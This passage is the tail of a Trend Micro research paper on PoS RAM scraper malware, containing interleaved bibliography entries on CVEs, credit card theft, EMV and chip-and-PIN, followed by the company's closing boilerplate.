Encyclopedia. “Adobe TIFF File Vulnerability.”
Last accessed August 21, 2014, http://about- 62. Brian Krebs. (July 25, 2013). Krebs on
threats.trendmicro.com/us/vulnerability/722/ Security. “Hacker Ring Stole 160 Million
adobe%20tiff%20file%20vulnerability. Credit Cards.” Last accessed August 26,
2014, http://krebsonsecurity.com/2013/07/
55. NIST. (2014). National Vulnerability hacker-ring-stole-160-million-credit-cards/.
Database. “Vulnerability Summary for CVE-
2010-2883.” Last accessed August 21, 63. Tom Gara. (February 6, 2014). The Wall
2014, http://web.nvd.nist.gov/view/vuln/ Street Journal. “October 2015: The End of the
detail?vulnId=CVE-2010-2883. Swipe-and-Sign Credit Card.” Last accessed
August 21, 2014, http://blogs.wsj.com/
56. NIST. (2014). National Vulnerability Database. corporate-intelligence/2014/02/06/october-
“Search CVE and CCE Vulnerability 2015-the-end-of-the-swipe-and-sign-credit-
Database.” Last accessed August 21, 2014, card/.
http://web.nvd.nist.gov/view/vuln/search.
64. Bob Russo. (March 4, 2014). “Statement
57. Trend Micro Incorporated. (2014). Threat for the Record: Can Technology
Encyclopedia. “Lateral Movement: How Protect Americans from International
Do Threat Actors Move Deeper into Your Cybercriminals?” Last accessed August
Network?” Last accessed August 21, 2014, 21, 2014, http://science.house.gov/sites/
http://about-threats.trendmicro.com/cloud- republicans.science.house.gov/files/
content/us/ent-primers/pdf/tlp_lateral_ documents/HHRG-113-SY21-WState-
movement.pdf. BRusso-20140306.pdf.

58. Ground Labs. (January 2014). Cardholder 65. Lysa Myers. (April 3, 2014). WeLiveSecurity.
Data Discovery Blog. “Unauthorised Copies “What Is EMV, and Why Is It Such a Hot

91
Trend Micro | PoS RAM Scraper Malware

Topic?” Last accessed August 21, 2014, 21, 2014, http://www.trendmicro.com/us/


http://www.welivesecurity.com/2014/04/03/ enterprise/cloud-solutions/deep-security/.
what-is-emv-and-why-is-it-such-a-hot-topic/.
69. Trend Micro Incorporated. (2014). Trend
66. Steven Murdoch, Saar Drimer, Ross Micro. “Only a Custom Defense Effectively
Anderson, and Mike Bond. (July 25, 2014). Combats Advanced Persistent Threats.”
Chip and PIN Is Broken. Last accessed August 21, 2014, http://www.
trendmicro.com/us/enterprise/challenges/
67. emvx. (January 31, 2011). Emvx Blog. advance-targeted-attacks/.
“Contactless Card Payment Specifications.”
Last accessed August 21, 2014, http://blog. 70. Trend Micro Incorporated. (2014). Trend
level2kernel.com/contactless-card-payment- Micro. “Deep Discovery.” Last accessed
specifications/. August 21, 2014, http://www.trendmicro.com/
us/enterprise/security-risk-management/deep-
68. Trend Micro Incorporated. (2014). Trend discovery/.
Micro. “Deep Security.” Last accessed August

92
Trend Micro Incorporated, a global leader in security software, strives to make the
world safe for exchanging digital information. Our innovative solutions for consumers,
businesses and governments provide layered content security to protect information
on mobile devices, endpoints, gateways, servers and the cloud. All of our solutions are
powered by cloud-based global threat intelligence, the Trend Micro™ Smart Protection
Network™, and are supported by over 1,200 threat experts around the globe. For more
information, visit www.trendmicro.com.

©2014 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend 225 E. John Carpenter Freeway, Suite 1500
Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. Irving, Texas 75062 U.S.A.
All other product or company names may be trademarks or registered trademarks of
their owners. Phone: +1.817.569,8900

You might also like